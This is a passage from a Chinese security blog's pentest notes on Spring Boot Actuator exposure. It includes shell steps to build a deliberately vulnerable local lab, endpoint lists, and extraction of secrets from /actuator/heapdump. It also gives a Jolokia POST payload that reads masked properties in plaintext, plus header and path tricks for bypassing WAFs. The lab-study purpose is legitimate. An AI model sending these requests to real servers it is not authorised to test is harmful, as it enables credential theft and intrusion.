<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"/><meta name="theme-color" content="#222"/><meta http-equiv="X-UA-COMPATIBLE" content="IE=edge,chrome=1"/><meta name="renderer" content="webkit"/><link rel="icon" type="image/ico" sizes="32x32" href="/assets/favicon.ico"/><link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png"/><link rel="alternate" href="/rss.xml" title="欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~" type="application/rss+xml"><link rel="alternate" href="/atom.xml" title="欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~" type="application/atom+xml"><link rel="alternate" type="application/json" title="欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~" href="https://zlaryy.top/feed.json"/><link rel="preconnect" href="https://s4.zstatic.net"/><link rel="preconnect" href="https://at.alicdn.com"/><link rel="modulepreload" href="/js/siteInit.js"></link><link rel="modulepreload" href="/js/nyx-player-HIXTN7KD.js"></link><link rel="modulepreload" href="/js/copy-tex-4AIDXWNJ.js"></link><link rel="modulepreload" href="/js/post-MYXPIC3N.js"></link><link rel="modulepreload" href="/js/chunk-T54OBHW4.js"></link><link rel="modulepreload" href="/js/index.esm-22UB7CNZ.js"></link><link rel="modulepreload" href="/js/chunk-HJSTZ4VX.js"></link><link rel="modulepreload" href="/js/chunk-ALXQBZTY.js"></link><link rel="stylesheet" href="/css/siteInit.css" media="none" onload="this.media&#x3D;&#39;all&#39;"></link><link rel="preload" href="/assets/picture4.webp" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture4.webp" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture2.webp" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture2.webp" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture3.webp" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture1.webp" as="image" fetchpriority="high"><meta name="keywords" content="Web安全"/><meta name="description" content="Web安全 / CTF / 个人学习笔记"/><link rel="canonical" href="https://zlaryy.top/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/"><link rel="stylesheet" href="/css/post.css?v=0.5.4"><link rel="stylesheet" href="/css/mermaid.css?v=0.5.4"><!-- 临时处理--><link rel="stylesheet" media="none" onload="this.media='all'" href="https://s4.zstatic.net/ajax/libs/KaTeX/0.16.9/katex.min.css"><title>常规外网打点</title><!-- hexo injector head_end start --><link rel="stylesheet" href="https://npm.elemecdn.com/lxgw-wenkai-screen-webfont/style.css">
<link rel="stylesheet" href="/css/custom.css"><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head><body itemscope itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="pagefind_mount"></div><div id="container"><header id="header" itemscope itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">常规外网打点</h1><div class="meta"><span class="item" title="创建时间：2026-05-19 21:00:00"><span class="icon"><i class="ic i-calendar"></i></span><span class="text">发表于</span><time itemprop="dateCreated datePublished" datetime="2026-05-19T21:00:00+08:00">2026-05-19</time></span><span class="item" title="本文字数"><span class="icon"><i class="ic i-pen"></i></span><span class="text">本文字数</span><span>31k</span><span class="text">字</span></span><span class="item" title="阅读时长"><span class="icon"><i class="ic i-clock"></i></span><span class="text">阅读时长</span><span>28 分钟</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="切换导航栏"><span class="line"></span><span class="line"></span><span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">ZLARYY</a></li></ul><ul class="right" id="rightNav"><li class="item theme"><i class="ic i-sun"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div class="pjax" id="imgs"><ul><li class="item" style="background-image: url(&quot;/assets/picture4.webp&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture4.webp&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture2.webp&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture2.webp&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture3.webp&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture1.webp&quot;);"></li></ul></div></header><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"></use><use xlink:href="#gentle-wave" x="48" y="3"></use><use xlink:href="#gentle-wave" x="48" y="5"></use><use xlink:href="#gentle-wave" x="48" y="7"></use></g></svg></div><main><div class="inner"><div class="pjax" id="main"><div class="article wrap"><div class="breadcrumb" itemListElement itemscope itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i><span><a href="/">首页</a></span></div><article class="post block" itemscope="itemscope" itemtype="http://schema.org/Article" data-pagefind-body="data-pagefind-body" lang="zh-CN"><link itemprop="mainEntityOfPage" href="https://zlaryy.top/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/"/><span hidden="hidden" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><meta itemprop="image" content="/assets/avertar.png"/><meta itemprop="name" content="ZLARYY"/><meta itemprop="description" content=", Web安全 / CTF / 个人学习笔记"/></span><span hidden="hidden" itemprop="publisher" itemscope="itemscope" itemtype="http://schema.org/Organization"><meta itemprop="name" content="欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~"/></span><div class="body md" itemprop="articleBody"><h1 id="常规外网打点持续更新中"><a class="anchor" href="#常规外网打点持续更新中">#</a> 常规外网打点（持续更新中......）</h1>
<h1 id="spring-boot"><a class="anchor" href="#spring-boot">#</a> spring-boot</h1>
<h2 id="actuator泄露"><a class="anchor" href="#actuator泄露">#</a> actuator泄露</h2>
<p>参考：<a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/407651.html">可造成敏感信息泄露！Spring Boot Actuator信息泄露漏洞三种利用方式总结 - FreeBuf网络安全行业门户</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/JHIII/article/details/126601858">Springboot之Actuator信息泄露漏洞利用_spring actuator 漏洞-CSDN博客</a></p>
<p>actuator是帮助管理和监控<code>Spring-Boot</code>应用的模块，这个模块采集应用的内部信息，展现给外部模块，可以查看应用配置的详细信息，例如自动化配置信息、创建的<code>Spring beans</code>信息、系统环境变量的配置信息以及web请求的详细信息等。</p>
<p>如果没有正确使用Actuator，可能造成信息泄露等严重的安全隐患（外部人员非授权访问Actuator），其中heapdump作为Actuator组件最为危险的web端点，heapdump因未授权访问被恶意人员获取后进行分析，可进一步获取敏感信息</p>
<h3 id="1x版本"><a class="anchor" href="#1x版本">#</a> 1.x版本</h3>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>/configprops #显示所有@ConfigurationProperties</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/env #公开Spring的ConfigurableEnvironment</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/health #显示应用程序运行状况信息</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/httptrace #显示HTTP跟踪信息</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/metrics #显示当前应用程序的监控指标信息</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/mappings #显示所有@RequestMapping路径的整理列表</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/threaddump #线程转储</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/heapdump #堆转储</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/jolokia #JMX-HTTP桥,它提供了一种访问JMXbeans的替代方法</span></span></code></pre>
<h3 id="2x版本"><a class="anchor" href="#2x版本">#</a> 2.x版本</h3>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>/actuator #查看有哪些Actuator端点是开放的</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/auditevent #auditevents端点提供有关应用程序审计事件的信息</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/beans #beans端点提供有关应用程序bean的信息</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/configprops #configprops端点提供有关应用程序@ConfigurationProperties的信息</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/env #查看全部环境属性，可以看到Spring-boot载入哪些properties，以及properties的值（会自动用*替换key、password、secret等关键字的properties的值）</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/flyway #flyway端点提供有关Flyway执行的数据库迁移的信息</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/health #显示应用程序运行状况信息</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/httptrace #提供有关http请求-响应交换的信息（包括用户HTTP请求的Cookie数据，会造成Cookie泄露等）</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/info #info端点提供有关应用程序的一般信息</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/integrationgraph #integrationgraph端点公开了一个包含所有Spring Integrationgraph组件的图</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/liquibase #liquibase端点提供有关Liquibase应用的数据库更改集的信息</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/logfile #logfile端点提供对应用程序日志文件内容的访问</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/loggers #loggers端点提供对应用程序记录器及其级别配置的访问</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/mappings #mappings端点提供有关应用程序请求映射的信息</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/metrics #metrics端点提供对应用程序指标的访问</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/heapdump #heapdump端点提供来自应用程序JVM的堆转储（通过分析查看/env端点被*替换到数据的具体值）</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/threaddump #线程转储</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/jolokia #JMX-HTTP桥,它提供了一种访问JMXbeans的替代方法</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/prometheus #端点以prometheusPrometheus服务器抓取所需的格式提供Spring-boot应用程序的指标</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/quartz #quartz端点提供有关由Quartz调整程序管理的作业和触发器的信息</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/scheduledtasks #scheduledtasks端点提供有关应用程序计划执行任务的信息</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/sessions #sessions端点提供有关由Spring session管理的应用程序HTTP会话的信息</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/startup #startup端点提供有关应用程序启动顺序的信息</span></span>
<span class="line"><span></span></span>
<span class="line"><span>/actuator/shutdown #shutdown端点用于关闭应用程序</span></span></code></pre>
<p>接下来就是要利用heapdump去解决密码是<code>*</code>的问题，尝试了一下在本地搭建带有spring-boot的actuator信息泄露的靶场：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>这里用的是kaliLinux</span></span>
<span class="line"><span></span></span>
<span class="line"><span># 更新软件源并安装 OpenJDK 11 和 Maven</span></span>
<span class="line"><span>sudo apt update</span></span>
<span class="line"><span>sudo apt install default-jdk maven -y</span></span>
<span class="line"><span></span></span>
<span class="line"><span># 验证安装是否成功（确保有版本信息输出）</span></span>
<span class="line"><span>java -version</span></span>
<span class="line"><span>mvn -version</span></span>
<span class="line"><span></span></span>
<span class="line"><span>#创建并就进入项目文件夹</span></span>
<span class="line"><span>mkdir ~/actuator-lab &#x26;&#x26; cd ~/actuator-lab</span></span>
<span class="line"><span></span></span>
<span class="line"><span>#写入Maven配置文件（pom.xml）</span></span>
<span class="line"><span>cat &#x3C;&#x3C; 'EOF' > pom.xml</span></span>
<span class="line"><span>&#x3C;?xml version="1.0" encoding="UTF-8"?></span></span>
<span class="line"><span>&#x3C;project xmlns="http://maven.apache.org/POM/4.0.0"</span></span>
<span class="line"><span>         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"</span></span>
<span class="line"><span>         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"></span></span>
<span class="line"><span>    &#x3C;modelVersion>4.0.0&#x3C;/modelVersion></span></span>
<span class="line"><span>    &#x3C;groupId>com.lab&#x3C;/groupId></span></span>
<span class="line"><span>    &#x3C;artifactId>actuator-lab&#x3C;/artifactId></span></span>
<span class="line"><span>    &#x3C;version>1.0&#x3C;/version></span></span>
<span class="line"><span>    &#x3C;parent></span></span>
<span class="line"><span>        &#x3C;groupId>org.springframework.boot&#x3C;/groupId></span></span>
<span class="line"><span>        &#x3C;artifactId>spring-boot-starter-parent&#x3C;/artifactId></span></span>
<span class="line"><span>        &#x3C;version>2.7.5&#x3C;/version></span></span>
<span class="line"><span>    &#x3C;/parent></span></span>
<span class="line"><span>    &#x3C;dependencies></span></span>
<span class="line"><span>        &#x3C;dependency></span></span>
<span class="line"><span>            &#x3C;groupId>org.springframework.boot&#x3C;/groupId></span></span>
<span class="line"><span>            &#x3C;artifactId>spring-boot-starter-web&#x3C;/artifactId></span></span>
<span class="line"><span>        &#x3C;/dependency></span></span>
<span class="line"><span>        &#x3C;dependency></span></span>
<span class="line"><span>            &#x3C;groupId>org.springframework.boot&#x3C;/groupId></span></span>
<span class="line"><span>            &#x3C;artifactId>spring-boot-starter-actuator&#x3C;/artifactId></span></span>
<span class="line"><span>        &#x3C;/dependency></span></span>
<span class="line"><span>    &#x3C;/dependencies></span></span>
<span class="line"><span>    &#x3C;build></span></span>
<span class="line"><span>        &#x3C;plugins></span></span>
<span class="line"><span>            &#x3C;plugin></span></span>
<span class="line"><span>                &#x3C;groupId>org.springframework.boot&#x3C;/groupId></span></span>
<span class="line"><span>                &#x3C;artifactId>spring-boot-maven-plugin&#x3C;/artifactId></span></span>
<span class="line"><span>            &#x3C;/plugin></span></span>
<span class="line"><span>        &#x3C;/plugins></span></span>
<span class="line"><span>    &#x3C;/build></span></span>
<span class="line"><span>&#x3C;/project></span></span>
<span class="line"><span>EOF</span></span>
<span class="line"><span></span></span>
<span class="line"><span>#创建目录并写入配置文件（包含敏感信息）</span></span>
<span class="line"><span>mkdir -p src/main/resources</span></span>
<span class="line"><span>cat &#x3C;&#x3C; 'EOF' > src/main/resources/application.properties</span></span>
<span class="line"><span># 危险配置：暴露所有 actuator 接口</span></span>
<span class="line"><span>management.endpoints.web.exposure.include=*</span></span>
<span class="line"><span># 模拟敏感配置信息</span></span>
<span class="line"><span>cloud.aws.credentials.access-key=AKIAIOSFODNN7EXAMPLE</span></span>
<span class="line"><span>cloud.aws.credentials.secret-key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY</span></span>
<span class="line"><span>EOF</span></span>
<span class="line"><span></span></span>
<span class="line"><span>#创建目录并写入Java漏洞代码</span></span>
<span class="line"><span>mkdir -p src/main/java/com/lab</span></span>
<span class="line"><span>cat &#x3C;&#x3C; 'EOF' > src/main/java/com/lab/ActuatorDemoApplication.java</span></span>
<span class="line"><span>package com.lab;</span></span>
<span class="line"><span></span></span>
<span class="line"><span>import org.springframework.boot.SpringApplication;</span></span>
<span class="line"><span>import org.springframework.boot.autoconfigure.SpringBootApplication;</span></span>
<span class="line"><span>import org.springframework.web.bind.annotation.GetMapping;</span></span>
<span class="line"><span>import org.springframework.web.bind.annotation.RestController;</span></span>
<span class="line"><span></span></span>
<span class="line"><span>@SpringBootApplication</span></span>
<span class="line"><span>@RestController</span></span>
<span class="line"><span>public class ActuatorDemoApplication &#123;</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    // 模拟内存中驻留的敏感变量</span></span>
<span class="line"><span>    private String userSessionToken = "";</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    public static void main(String[] args) &#123;</span></span>
<span class="line"><span>        SpringApplication.run(ActuatorDemoApplication.class, args);</span></span>
<span class="line"><span>    &#125;</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    @GetMapping("/login")</span></span>
<span class="line"><span>    public String login(String password) &#123;</span></span>
<span class="line"><span>        // 将用户的密码拼接后长期保留在内存中</span></span>
<span class="line"><span>        this.userSessionToken = "Token_Auth_" + password;</span></span>
<span class="line"><span>        return "Login Success! Password saved in memory.";</span></span>
<span class="line"><span>    &#125;</span></span>
<span class="line"><span>&#125;</span></span>
<span class="line"><span>EOF</span></span>
<span class="line"><span></span></span>
<span class="line"><span>#在~/actuator-lab目录下运行命令启动spring boot</span></span>
<span class="line"><span>mvn spring-boot:run</span></span>
<span class="line"><span>当终端出现类似 Started ActuatorDemoApplication in x.xx seconds 的字样时，说明靶场启动成功</span></span></code></pre>
<p>搭建好之后可以通过IP下的8080端口访问</p>
<p><img loading="lazy" src="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/1.png" class=""></p>
<p>我们需要知道这个值，可以有几种利用方法</p>
<h4 id="heapdump"><a class="anchor" href="#heapdump">#</a> heapdump</h4>
<p>首先模拟一个登录状态，之后我们尝试信息泄露的手法去访问<code>/actuator/env</code>和<code>/actuator/heapdump</code></p>
<p><img loading="lazy" src="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/2.png" class=""></p>
<p><img loading="lazy" src="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/3.png" class=""></p>
<p>访问<code>/actuator/heapdump</code>的话可以看到直接下载下来了一个文件，分析这个文件可以使用<code>jvisualvm.exe</code>这个JDK自带的工具，路径为<code>JDK\bin\jvisualvm.exe</code></p>
<p><img loading="lazy" src="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/4.png" class=""></p>
<p>文件类型选择堆之后选择刚刚下载的heapdump，装入文件之后就是输入OQL语句过滤我们需要的信息</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>OQL是一种类似SQL的查询语言，用于查询Java堆，OQL允许从Java堆中过滤/选择所需的信息。虽然HAT已经支持诸如“显示X类的所有实例”之类的预定义查询，但OQL增加了更多的灵活性。OQL基于JavaScript表达式语言。</span></span></code></pre>
<p>在Spring boot2.X版本中，env信息存储在java.util.LinkedHashMap$Entry类中</p>
<p>查询数据库密码需要在OQL控制台执行如下OQL语句：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>select s from java.util.LinkedHashMap$Entry s where /spring.datadsource.password/.test(s.key)</span></span></code></pre>
<p>不过我这里一直显示查询返回结果为空呢？</p>
<p>另一种方法就是先进入<code>类标签页</code>，在底部过滤器中搜索<code>ActuatorDemoApplication</code></p>
<p><img loading="lazy" src="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/5.png" class=""></p>
<p>双击显示的有实例的类</p>
<p><img loading="lazy" src="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/6.png" class=""></p>
<p>找到这个<code>userSessionToken</code>，打开之后我们可以看到存在一个value：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>84111107101110956511711610495907665828989</span></span></code></pre>
<p><img loading="lazy" src="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/7.png" class=""></p>
<p>用逗号隔开的数字每一组对应一个字符的ASCII码：<code>Token_Auth_ZLARYY</code></p>
<p>也可以试试使用<a href="https://link.zhihu.com/?target=https%3A//github.com/wyzxxz/heapdump_tool">https://github.com/wyzxxz/heapdump_tool</a></p>
<p><img loading="lazy" src="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/8.png" class=""></p>
<p>查询密码可以<code>&gt; password</code>，获取ip<code>&gt; getip</code>，获取url<code>&gt; geturl</code>，获取文件路径<code>&gt; getfile</code></p>
<h4 id="jolokia"><a class="anchor" href="#jolokia">#</a> jolokia</h4>
<p>要利用这个方法的话需要目标网站存在<code>/jolokia</code>、<code>/actuator/jolokia</code>，使用了<code>jolokia-core</code>依赖，默认情况下actuator是没有jolokia接口的，所以需要再添加如下依赖：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>&#x3C;dependency></span></span>
<span class="line"><span>    &#x3C;groupId>org.jolokia&#x3C;/groupId> </span></span>
<span class="line"><span>    &#x3C;artifactId>jolokia-core&#x3C;/artifactId> </span></span>
<span class="line"><span>&#x3C;version>1.7.0&#x3C;/version> </span></span>
<span class="line"><span>&#x3C;/dependency></span></span></code></pre>
<p>除此之外我们还需要在<code>/src/main/resources/application.properties</code>加上：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>spring.application.admin.enabled=true</span></span></code></pre>
<p>首先依旧是访问<code>/actuator/env</code>接口，，获取想要获得明文的属性名，然后通过jolokia调用相关MBean获取明文。</p>
<p><img loading="lazy" src="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/9.png" class=""></p>
<p>接下来我们访问<code>/actuator/jolokia/list</code></p>
<p><img loading="lazy" src="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/10.png" class=""></p>
<p>查看的内容是目标环境中存在的MBean</p>
<p>接下来我们尝试通过调用我们找到的MBean来获取我们感兴趣字段的明文：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>POST/actuator/jolokia </span></span>
<span class="line"><span>Content-Type:application/json </span></span>
<span class="line"><span>&#123;"mbean":"org.springframework.boot:name=SpringApplication,type=Admin","operation":"getProperty","type":"EXEC","arguments":["security.user.password"]&#125;</span></span>
<span class="line"><span>#这里用的是security.user.password，在我这里查询应该是cloud.aws.credentials.secret-key</span></span></code></pre>
<p>jolokia是一个JMX-HTTP桥接器，在Java中，JMX（Java Management Extensions）是用来在程序运行期间管理和监控Java程序的底层机制。Jolokia允许你通过发送简单的HTTP(JSON)请求，去调用Java底层的JMX方法，这段payload其实是执行了：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>// 获取名为 SpringApplication 的管理 Bean (MBean)</span></span>
<span class="line"><span>Object mbean = getMBean("org.springframework.boot:name=SpringApplication,type=Admin");</span></span>
<span class="line"><span></span></span>
<span class="line"><span>// 执行 (EXEC) 它的 getProperty 方法，传入参数 "security.user.password"</span></span>
<span class="line"><span>mbean.getProperty("security.user.password");</span></span></code></pre>
<p><img loading="lazy" src="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/11.png" class=""></p>
<p>如果是直接<code>change request method</code>的话要记得把<code>Content-Type</code>改为<code>application/json</code>，否则默认会是<code>application/x-www-form-urlencoded</code></p>
<h3 id="绕过waf的一些相关方法"><a class="anchor" href="#绕过waf的一些相关方法">#</a> 绕过waf的一些相关方法</h3>
<p>文章参考：<a target="_blank" rel="noopener" href="https://zone.ci/secarticles/wx/501728.html">SpringBootActuator配置错误利用实战：路径探测、绕过技巧与敏感端点攻击 | ZONE.CI 全球网</a></p>
<ul>
<li>
<p>路径变体寻找actuator：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>#系统管理员可能将端点直接暴露在站点根目录下</span></span>
<span class="line"><span>GET /env HTTP/2</span></span>
<span class="line"><span>#Actuator 也可能存在于子目录中</span></span>
<span class="line"><span>GET /att-admin/env HTTP/2</span></span>
<span class="line"><span>GET /att-admin/actuator/env HTTP/2</span></span>
<span class="line"><span>GET /att-admin/info/env HTTP/2</span></span></code></pre>
</li>
<li>
<p>通过特殊HTTP头访问actuator</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>X-Forwarded-For: 127.0.0.1</span></span>
<span class="line"><span>X-Original-URL: /avtuator/env</span></span></code></pre>
</li>
<li>
<p>访问mappings端点</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>GET /actuator/mappings HTTP/2</span></span></code></pre>
<p>访问这个端点很可能暴露出一些路由，去尝试访问就行</p>
<p>如果mappings不可用的话，可以检查metrics端点：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>GET /actuator/metrics HTTP/2</span></span></code></pre>
<p>它会返回可在后续请求中查询的指标名称列表:</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>&#123;"names":["application.ready.time","application.started.time","disk.free","disk.total","executor.active","executor.completed","executor.pool.core","executor.pool.max","executor.pool.size","executor.queue.remaining","executor.queued","http.client.requests","http.client.requests.active","http.server.requests","http.server.requests.active","jvm.buffer.count","jvm.buffer.memory.used","jvm.buffer.total.capacity","jvm.classes.loaded","jvm.classes.unloaded","jvm.compilation.time","jvm.gc.live.data.size","jvm.gc.max.data.size","jvm.gc.memory.allocated","jvm.gc.memory.promoted","jvm.gc.overhead","jvm.gc.pause","jvm.info","jvm.memory.committed","jvm.memory.max","jvm.memory.usage.after.gc","jvm.memory.used","jvm.threads.daemon","jvm.threads.live","jvm.threads.peak","jvm.threads.started","jvm.threads.states","logback.events","process.cpu.time","process.cpu.usage","process.files.max","process.files.open","process.start.time","process.uptime","spring.cloud.gateway.requests","spring.cloud.gateway.routes.count","system.cpu.count","system.cpu.usage","system.load.average.1m"]&#125;</span></span></code></pre>
<p>其中大部分是普通的元数据，值得关注的有：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>#利用这个字段产生的值尝试 vhost Fuzz 可能会有收获。这些主机名在 SSRF 场景中也非常有价值</span></span>
<span class="line"><span>spring.cloud.gateway.requests</span></span>
<span class="line"><span>#本质上是 mappings的低精度替代——信息量较少但仍然有用。从这里开始测试发现的路由即可</span></span>
<span class="line"><span>http.server.requests</span></span>
<span class="line"><span>#其含义与其他 metrics 类似。这些指标提供了有用的信息，能间接引导你继续深入</span></span>
<span class="line"><span>http.client.requests</span></span></code></pre>
<p>使用方法如下：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>GET /actuator/metrics/&#123;metric-name&#125; HTTP/2</span></span></code></pre>
<p>查询后 (精简输出) 可以揭示服务器或客户端最近发送或接收的请求</p>
</li>
<li>
<p>路径遍历与绕过</p>
<p>一般来说，简单和双重 URL 编码有时能帮助访问”被屏蔽”的 Actuator 端点</p>
